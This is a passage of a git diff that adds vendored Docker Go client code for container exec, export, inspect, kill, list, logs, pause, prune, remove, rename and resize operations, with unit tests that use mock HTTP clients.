&types.ExecConfig{} + if err := json.NewDecoder(req.Body).Decode(execConfig); err != nil { + return nil, err + } + if execConfig.User != "user" { + return nil, fmt.Errorf("expected an execConfig with User == 'user', got %v", execConfig) + } + b, err := json.Marshal(types.IDResponse{ + ID: "exec_id", + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(b)), + }, nil + }), + } + + r, err := client.ContainerExecCreate(context.Background(), "container_id", types.ExecConfig{ + User: "user", + }) + if err != nil { + t.Fatal(err) + } + if r.ID != "exec_id" { + t.Fatalf("expected `exec_id`, got %s", r.ID) + } +} + +func TestContainerExecStartError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + err := client.ContainerExecStart(context.Background(), "nothing", types.ExecStartCheck{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestContainerExecStart(t *testing.T) { + expectedURL := "/exec/exec_id/start" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if err := req.ParseForm(); err != nil { + return nil, err + } + execStartCheck := &types.ExecStartCheck{} + if err := json.NewDecoder(req.Body).Decode(execStartCheck); err != nil { + return nil, err + } + if execStartCheck.Tty || !execStartCheck.Detach { + return nil, fmt.Errorf("expected execStartCheck{Detach:true,Tty:false}, got %v", execStartCheck) + } + + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), + }, nil + }), + } + + err := client.ContainerExecStart(context.Background(), "exec_id", types.ExecStartCheck{ + Detach: true, + Tty: false, + }) + if err != nil { + t.Fatal(err) + } +} + +func TestContainerExecInspectError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, err := client.ContainerExecInspect(context.Background(), "nothing") + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestContainerExecInspect(t *testing.T) { + expectedURL := "/exec/exec_id/json" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + b, err := json.Marshal(types.ContainerExecInspect{ + ExecID: "exec_id", + ContainerID: "container_id", + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(b)), + }, nil + }), + } + + inspect, err := client.ContainerExecInspect(context.Background(), "exec_id") + if err != nil { + t.Fatal(err) + } + if inspect.ExecID != "exec_id" { + t.Fatalf("expected ExecID to be `exec_id`, got %s", inspect.ExecID) + } + if inspect.ContainerID != "container_id" { + t.Fatalf("expected ContainerID `container_id`, got %s", inspect.ContainerID) + } +} diff --git a/vendor/github.com/docker/docker/client/container_export.go b/vendor/github.com/docker/docker/client/container_export.go new file mode 100644 index 0000000000..52194f3d34 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_export.go @@ -0,0 +1,20 @@ +package client + +import ( + "io" + "net/url" + + "golang.org/x/net/context" +) + +// ContainerExport retrieves the raw contents of a container +// and returns them as an io.ReadCloser. It's up to the caller +// to close the stream. +func (cli *Client) ContainerExport(ctx context.Context, containerID string) (io.ReadCloser, error) { + serverResp, err := cli.get(ctx, "/containers/"+containerID+"/export", url.Values{}, nil) + if err != nil { + return nil, err + } + + return serverResp.body, nil +} diff --git a/vendor/github.com/docker/docker/client/container_export_test.go b/vendor/github.com/docker/docker/client/container_export_test.go new file mode 100644 index 0000000000..5849fe9252 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_export_test.go @@ -0,0 +1,50 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" +) + +func TestContainerExportError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, err := client.ContainerExport(context.Background(), "nothing") + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestContainerExport(t *testing.T) { + expectedURL := "/containers/container_id/export" + client := &Client{ + client: newMockClient(func(r *http.Request) (*http.Response, error) { + if !strings.HasPrefix(r.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, r.URL) + } + + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte("response"))), + }, nil + }), + } + body, err := client.ContainerExport(context.Background(), "container_id") + if err != nil { + t.Fatal(err) + } + defer body.Close() + content, err := ioutil.ReadAll(body) + if err != nil { + t.Fatal(err) + } + if string(content) != "response" { + t.Fatalf("expected response to contain 'response', got %s", string(content)) + } +} diff --git a/vendor/github.com/docker/docker/client/container_inspect.go b/vendor/github.com/docker/docker/client/container_inspect.go new file mode 100644 index 0000000000..17f1809747 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_inspect.go @@ -0,0 +1,54 @@ +package client + +import ( + "bytes" + "encoding/json" + "io/ioutil" + "net/http" + "net/url" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// ContainerInspect returns the container information. +func (cli *Client) ContainerInspect(ctx context.Context, containerID string) (types.ContainerJSON, error) { + serverResp, err := cli.get(ctx, "/containers/"+containerID+"/json", nil, nil) + if err != nil { + if serverResp.statusCode == http.StatusNotFound { + return types.ContainerJSON{}, containerNotFoundError{containerID} + } + return types.ContainerJSON{}, err + } + + var response types.ContainerJSON + err = json.NewDecoder(serverResp.body).Decode(&response) + ensureReaderClosed(serverResp) + return response, err +} + +// ContainerInspectWithRaw returns the container information and its raw representation. +func (cli *Client) ContainerInspectWithRaw(ctx context.Context, containerID string, getSize bool) (types.ContainerJSON, []byte, error) { + query := url.Values{} + if getSize { + query.Set("size", "1") + } + serverResp, err := cli.get(ctx, "/containers/"+containerID+"/json", query, nil) + if err != nil { + if serverResp.statusCode == http.StatusNotFound { + return types.ContainerJSON{}, nil, containerNotFoundError{containerID} + } + return types.ContainerJSON{}, nil, err + } + defer ensureReaderClosed(serverResp) + + body, err := ioutil.ReadAll(serverResp.body) + if err != nil { + return types.ContainerJSON{}, nil, err + } + + var response types.ContainerJSON + rdr := bytes.NewReader(body) + err = json.NewDecoder(rdr).Decode(&response) + return response, body, err +} diff --git a/vendor/github.com/docker/docker/client/container_inspect_test.go b/vendor/github.com/docker/docker/client/container_inspect_test.go new file mode 100644 index 0000000000..f1a6f4ac7d --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_inspect_test.go @@ -0,0 +1,125 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +func TestContainerInspectError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, err := client.ContainerInspect(context.Background(), "nothing") + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestContainerInspectContainerNotFound(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusNotFound, "Server error")), + } + + _, err := client.ContainerInspect(context.Background(), "unknown") + if err == nil || !IsErrContainerNotFound(err) { + t.Fatalf("expected a containerNotFound error, got %v", err) + } +} + +func TestContainerInspect(t *testing.T) { + expectedURL := "/containers/container_id/json" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + content, err := json.Marshal(types.ContainerJSON{ + ContainerJSONBase: &types.ContainerJSONBase{ + ID: "container_id", + Image: "image", + Name: "name", + }, + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + } + + r, err := client.ContainerInspect(context.Background(), "container_id") + if err != nil { + t.Fatal(err) + } + if r.ID != "container_id" { + t.Fatalf("expected `container_id`, got %s", r.ID) + } + if r.Image != "image" { + t.Fatalf("expected `image`, got %s", r.ID) + } + if r.Name != "name" { + t.Fatalf("expected `name`, got %s", r.ID) + } +} + +func TestContainerInspectNode(t *testing.T) { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + content, err := json.Marshal(types.ContainerJSON{ + ContainerJSONBase: &types.ContainerJSONBase{ + ID: "container_id", + Image: "image", + Name: "name", + Node: &types.ContainerNode{ + ID: "container_node_id", + Addr: "container_node", + Labels: map[string]string{"foo": "bar"}, + }, + }, + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + } + + r, err := client.ContainerInspect(context.Background(), "container_id") + if err != nil { + t.Fatal(err) + } + if r.ID != "container_id" { + t.Fatalf("expected `container_id`, got %s", r.ID) + } + if r.Image != "image" { + t.Fatalf("expected `image`, got %s", r.ID) + } + if r.Name != "name" { + t.Fatalf("expected `name`, got %s", r.ID) + } + if r.Node.ID != "container_node_id" { + t.Fatalf("expected `container_node_id`, got %s", r.Node.ID) + } + if r.Node.Addr != "container_node" { + t.Fatalf("expected `container_node`, got %s", r.Node.Addr) + } + foo, ok := r.Node.Labels["foo"] + if foo != "bar" || !ok { + t.Fatalf("expected `bar` for label `foo`") + } +} diff --git a/vendor/github.com/docker/docker/client/container_kill.go b/vendor/github.com/docker/docker/client/container_kill.go new file mode 100644 index 0000000000..29f80c73ad --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_kill.go @@ -0,0 +1,17 @@ +package client + +import ( + "net/url" + + "golang.org/x/net/context" +) + +// ContainerKill terminates the container process but does not remove the container from the docker host. +func (cli *Client) ContainerKill(ctx context.Context, containerID, signal string) error { + query := url.Values{} + query.Set("signal", signal) + + resp, err := cli.post(ctx, "/containers/"+containerID+"/kill", query, nil, nil) + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/container_kill_test.go b/vendor/github.com/docker/docker/client/container_kill_test.go new file mode 100644 index 0000000000..9477b0abd2 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_kill_test.go @@ -0,0 +1,46 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" +) + +func TestContainerKillError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + err := client.ContainerKill(context.Background(), "nothing", "SIGKILL") + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestContainerKill(t *testing.T) { + expectedURL := "/containers/container_id/kill" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + signal := req.URL.Query().Get("signal") + if signal != "SIGKILL" { + return nil, fmt.Errorf("signal not set in URL query properly. Expected 'SIGKILL', got %s", signal) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), + }, nil + }), + } + + err := client.ContainerKill(context.Background(), "container_id", "SIGKILL") + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/container_list.go b/vendor/github.com/docker/docker/client/container_list.go new file mode 100644 index 0000000000..4398912197 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_list.go @@ -0,0 +1,56 @@ +package client + +import ( + "encoding/json" + "net/url" + "strconv" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "golang.org/x/net/context" +) + +// ContainerList returns the list of containers in the docker host. +func (cli *Client) ContainerList(ctx context.Context, options types.ContainerListOptions) ([]types.Container, error) { + query := url.Values{} + + if options.All { + query.Set("all", "1") + } + + if options.Limit != -1 { + query.Set("limit", strconv.Itoa(options.Limit)) + } + + if options.Since != "" { + query.Set("since", options.Since) + } + + if options.Before != "" { + query.Set("before", options.Before) + } + + if options.Size { + query.Set("size", "1") + } + + if options.Filters.Len() > 0 { + filterJSON, err := filters.ToParamWithVersion(cli.version, options.Filters) + + if err != nil { + return nil, err + } + + query.Set("filters", filterJSON) + } + + resp, err := cli.get(ctx, "/containers/json", query, nil) + if err != nil { + return nil, err + } + + var containers []types.Container + err = json.NewDecoder(resp.body).Decode(&containers) + ensureReaderClosed(resp) + return containers, err +} diff --git a/vendor/github.com/docker/docker/client/container_list_test.go b/vendor/github.com/docker/docker/client/container_list_test.go new file mode 100644 index 0000000000..e41c6874b5 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_list_test.go @@ -0,0 +1,96 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "golang.org/x/net/context" +) + +func TestContainerListError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, err := client.ContainerList(context.Background(), types.ContainerListOptions{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestContainerList(t *testing.T) { + expectedURL := "/containers/json" + expectedFilters := `{"before":{"container":true},"label":{"label1":true,"label2":true}}` + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + query := req.URL.Query() + all := query.Get("all") + if all != "1" { + return nil, fmt.Errorf("all not set in URL query properly. Expected '1', got %s", all) + } + limit := query.Get("limit") + if limit != "0" { + return nil, fmt.Errorf("limit should have not be present in query. Expected '0', got %s", limit) + } + since := query.Get("since") + if since != "container" { + return nil, fmt.Errorf("since not set in URL query properly. Expected 'container', got %s", since) + } + before := query.Get("before") + if before != "" { + return nil, fmt.Errorf("before should have not be present in query, go %s", before) + } + size := query.Get("size") + if size != "1" { + return nil, fmt.Errorf("size not set in URL query properly. Expected '1', got %s", size) + } + filters := query.Get("filters") + if filters != expectedFilters { + return nil, fmt.Errorf("expected filters incoherent '%v' with actual filters %v", expectedFilters, filters) + } + + b, err := json.Marshal([]types.Container{ + { + ID: "container_id1", + }, + { + ID: "container_id2", + }, + }) + if err != nil { + return nil, err + } + + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(b)), + }, nil + }), + } + + filters := filters.NewArgs() + filters.Add("label", "label1") + filters.Add("label", "label2") + filters.Add("before", "container") + containers, err := client.ContainerList(context.Background(), types.ContainerListOptions{ + Size: true, + All: true, + Since: "container", + Filters: filters, + }) + if err != nil { + t.Fatal(err) + } + if len(containers) != 2 { + t.Fatalf("expected 2 containers, got %v", containers) + } +} diff --git a/vendor/github.com/docker/docker/client/container_logs.go b/vendor/github.com/docker/docker/client/container_logs.go new file mode 100644 index 0000000000..69056b6321 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_logs.go @@ -0,0 +1,52 @@ +package client + +import ( + "io" + "net/url" + "time" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + timetypes "github.com/docker/docker/api/types/time" +) + +// ContainerLogs returns the logs generated by a container in an io.ReadCloser. +// It's up to the caller to close the stream. +func (cli *Client) ContainerLogs(ctx context.Context, container string, options types.ContainerLogsOptions) (io.ReadCloser, error) { + query := url.Values{} + if options.ShowStdout { + query.Set("stdout", "1") + } + + if options.ShowStderr { + query.Set("stderr", "1") + } + + if options.Since != "" { + ts, err := timetypes.GetTimestamp(options.Since, time.Now()) + if err != nil { + return nil, err + } + query.Set("since", ts) + } + + if options.Timestamps { + query.Set("timestamps", "1") + } + + if options.Details { + query.Set("details", "1") + } + + if options.Follow { + query.Set("follow", "1") + } + query.Set("tail", options.Tail) + + resp, err := cli.get(ctx, "/containers/"+container+"/logs", query, nil) + if err != nil { + return nil, err + } + return resp.body, nil +} diff --git a/vendor/github.com/docker/docker/client/container_logs_test.go b/vendor/github.com/docker/docker/client/container_logs_test.go new file mode 100644 index 0000000000..99e31842c9 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_logs_test.go @@ -0,0 +1,133 @@ +package client + +import ( + "bytes" + "fmt" + "io" + "io/ioutil" + "log" + "net/http" + "os" + "strings" + "testing" + "time" + + "github.com/docker/docker/api/types" + + "golang.org/x/net/context" +) + +func TestContainerLogsError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, err := client.ContainerLogs(context.Background(), "container_id", types.ContainerLogsOptions{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } + _, err = client.ContainerLogs(context.Background(), "container_id", types.ContainerLogsOptions{ + Since: "2006-01-02TZ", + }) + if err == nil || !strings.Contains(err.Error(), `parsing time "2006-01-02TZ"`) { + t.Fatalf("expected a 'parsing time' error, got %v", err) + } +} + +func TestContainerLogs(t *testing.T) { + expectedURL := "/containers/container_id/logs" + cases := []struct { + options types.ContainerLogsOptions + expectedQueryParams map[string]string + }{ + { + expectedQueryParams: map[string]string{ + "tail": "", + }, + }, + { + options: types.ContainerLogsOptions{ + Tail: "any", + }, + expectedQueryParams: map[string]string{ + "tail": "any", + }, + }, + { + options: types.ContainerLogsOptions{ + ShowStdout: true, + ShowStderr: true, + Timestamps: true, + Details: true, + Follow: true, + }, + expectedQueryParams: map[string]string{ + "tail": "", + "stdout": "1", + "stderr": "1", + "timestamps": "1", + "details": "1", + "follow": "1", + }, + }, + { + options: types.ContainerLogsOptions{ + // An complete invalid date, timestamp or go duration will be + // passed as is + Since: "invalid but valid", + }, + expectedQueryParams: map[string]string{ + "tail": "", + "since": "invalid but valid", + }, + }, + } + for _, logCase := range cases { + client := &Client{ + client: newMockClient(func(r *http.Request) (*http.Response, error) { + if !strings.HasPrefix(r.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, r.URL) + } + // Check query parameters + query := r.URL.Query() + for key, expected := range logCase.expectedQueryParams { + actual := query.Get(key) + if actual != expected { + return nil, fmt.Errorf("%s not set in URL query properly. Expected '%s', got %s", key, expected, actual) + } + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte("response"))), + }, nil + }), + } + body, err := client.ContainerLogs(context.Background(), "container_id", logCase.options) + if err != nil { + t.Fatal(err) + } + defer body.Close() + content, err := ioutil.ReadAll(body) + if err != nil { + t.Fatal(err) + } + if string(content) != "response" { + t.Fatalf("expected response to contain 'response', got %s", string(content)) + } + } +} + +func ExampleClient_ContainerLogs_withTimeout() { + ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second) + defer cancel() + + client, _ := NewEnvClient() + reader, err := client.ContainerLogs(ctx, "container_id", types.ContainerLogsOptions{}) + if err != nil { + log.Fatal(err) + } + + _, err = io.Copy(os.Stdout, reader) + if err != nil && err != io.EOF { + log.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/container_pause.go b/vendor/github.com/docker/docker/client/container_pause.go new file mode 100644 index 0000000000..412067a782 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_pause.go @@ -0,0 +1,10 @@ +package client + +import "golang.org/x/net/context" + +// ContainerPause pauses the main process of a given container without terminating it. +func (cli *Client) ContainerPause(ctx context.Context, containerID string) error { + resp, err := cli.post(ctx, "/containers/"+containerID+"/pause", nil, nil, nil) + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/container_pause_test.go b/vendor/github.com/docker/docker/client/container_pause_test.go new file mode 100644 index 0000000000..0ee2f05d7e --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_pause_test.go @@ -0,0 +1,41 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" +) + +func TestContainerPauseError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + err := client.ContainerPause(context.Background(), "nothing") + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestContainerPause(t *testing.T) { + expectedURL := "/containers/container_id/pause" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), + }, nil + }), + } + err := client.ContainerPause(context.Background(), "container_id") + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/container_prune.go b/vendor/github.com/docker/docker/client/container_prune.go new file mode 100644 index 0000000000..b582170867 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_prune.go @@ -0,0 +1,36 @@ +package client + +import ( + "encoding/json" + "fmt" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "golang.org/x/net/context" +) + +// ContainersPrune requests the daemon to delete unused data +func (cli *Client) ContainersPrune(ctx context.Context, pruneFilters filters.Args) (types.ContainersPruneReport, error) { + var report types.ContainersPruneReport + + if err := cli.NewVersionError("1.25", "container prune"); err != nil { + return report, err + } + + query, err := getFiltersQuery(pruneFilters) + if err != nil { + return report, err + } + + serverResp, err := cli.post(ctx, "/containers/prune", query, nil, nil) + if err != nil { + return report, err + } + defer ensureReaderClosed(serverResp) + + if err := json.NewDecoder(serverResp.body).Decode(&report); err != nil { + return report, fmt.Errorf("Error retrieving disk usage: %v", err) + } + + return report, nil +} diff --git a/vendor/github.com/docker/docker/client/container_remove.go b/vendor/github.com/docker/docker/client/container_remove.go new file mode 100644 index 0000000000..3a79590ced --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_remove.go @@ -0,0 +1,27 @@ +package client + +import ( + "net/url" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// ContainerRemove kills and removes a container from the docker host. +func (cli *Client) ContainerRemove(ctx context.Context, containerID string, options types.ContainerRemoveOptions) error { + query := url.Values{} + if options.RemoveVolumes { + query.Set("v", "1") + } + if options.RemoveLinks { + query.Set("link", "1") + } + + if options.Force { + query.Set("force", "1") + } + + resp, err := cli.delete(ctx, "/containers/"+containerID, query, nil) + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/container_remove_test.go b/vendor/github.com/docker/docker/client/container_remove_test.go new file mode 100644 index 0000000000..798c08b333 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_remove_test.go @@ -0,0 +1,59 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +func TestContainerRemoveError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + err := client.ContainerRemove(context.Background(), "container_id", types.ContainerRemoveOptions{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestContainerRemove(t *testing.T) { + expectedURL := "/containers/container_id" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + query := req.URL.Query() + volume := query.Get("v") + if volume != "1" { + return nil, fmt.Errorf("v (volume) not set in URL query properly. Expected '1', got %s", volume) + } + force := query.Get("force") + if force != "1" { + return nil, fmt.Errorf("force not set in URL query properly. Expected '1', got %s", force) + } + link := query.Get("link") + if link != "" { + return nil, fmt.Errorf("link should have not be present in query, go %s", link) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), + }, nil + }), + } + + err := client.ContainerRemove(context.Background(), "container_id", types.ContainerRemoveOptions{ + RemoveVolumes: true, + Force: true, + }) + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/container_rename.go b/vendor/github.com/docker/docker/client/container_rename.go new file mode 100644 index 0000000000..0e718da7c6 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_rename.go @@ -0,0 +1,16 @@ +package client + +import ( + "net/url" + + "golang.org/x/net/context" +) + +// ContainerRename changes the name of a given container. +func (cli *Client) ContainerRename(ctx context.Context, containerID, newContainerName string) error { + query := url.Values{} + query.Set("name", newContainerName) + resp, err := cli.post(ctx, "/containers/"+containerID+"/rename", query, nil, nil) + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/container_rename_test.go b/vendor/github.com/docker/docker/client/container_rename_test.go new file mode 100644 index 0000000000..732ebff5f7 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_rename_test.go @@ -0,0 +1,46 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" +) + +func TestContainerRenameError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + err := client.ContainerRename(context.Background(), "nothing", "newNothing") + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestContainerRename(t *testing.T) { + expectedURL := "/containers/container_id/rename" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + name := req.URL.Query().Get("name") + if name != "newName" { + return nil, fmt.Errorf("name not set in URL query properly. Expected 'newName', got %s", name) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), + }, nil + }), + } + + err := client.ContainerRename(context.Background(), "container_id", "newName") + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/container_resize.go b/vendor/github.com/docker/docker/client/container_resize.go new file mode 100644 index 0000000000..66c3cc1940 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_resize.go @@ -0,0 +1,29 @@ +package client + +import ( + "net/url" + "strconv" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// ContainerResize changes the size of the tty for a container. +func (cli *Client) ContainerResize(ctx context.Context, containerID string, options types.ResizeOptions) error { + return cli.resize(ctx, "/containers/"+containerID, options.Height, options.Width) +} + +// ContainerExecResize changes the size of the tty for an exec process running inside a container. +func (cli *Client) ContainerExecResize(ctx context.Context, execID string, options types.ResizeOptions) error { + return cli.resize(ctx, "/exec/"+execID, options.Height, options.Width) +} + +func (cli *Client) resize(ctx context.Context, basePath string, height, width uint) error { + query := url.Values{} + query.Set("h", strconv.Itoa(int(height))) + query.Set("w", strconv.Itoa(int(width))) + + resp, err := cli.post(ctx, basePath+"/resize", query, nil, nil) + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/container_resize_test.go b/vendor/github.com/docker/docker/client/container_resize_test.go new file mode 100644 index 0000000000..5b2efecdce --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_resize_test.go @@ -0,0 +1,82 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +func TestContainerResizeError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + err := client.ContainerResize(context.Background(), "container_id", types.ResizeOptions{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestContainerExecResizeError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + err := client.ContainerExecResize(context.Background(), "exec_id", types.ResizeOptions{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestContainerResize(t *testing.T) { + client := &Client{ + client: newMockClient(resizeTransport("/containers/container_id/resize")), + } + + err := client.ContainerResize(context.Background(), "container_id", types.ResizeOptions{ + Height: 500, + Width: 600, + }) + if err != nil { + t.Fatal(err) + } +} + +func TestContainerExecResize(t *testing.T) { + client := &Client{ + client: newMockClient(resizeTransport("/exec/exec_id/resize")), + } + + err := client.ContainerExecResize(context.Background(), "exec_id", types.ResizeOptions{ + Height: 500, + Width: 600, + }) + if err != nil { + t.Fatal(err) + } +} + +func resizeTransport(expectedURL string) func(req *http.Request) (*http.Response, error) { + return func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + query := req.URL.Query() + h := query.Get("h") + if h != "500" { + return nil, fmt.Errorf("h not set in URL query properly. Expected '500', got %s", h) + } + w := query.Get("w") + if w != "600" { + return nil, fmt.Errorf("w not set in URL query properly. Expected '600', got %s", w) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), + }, nil + } +} diff --git a/vendor/github.com/docker/docker/client/container_restart.go b/vendor/github.com/docker/docker/client/container_restart.go new file mode 100644 index 0000000000..74d7455f02 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_restart.go @@ 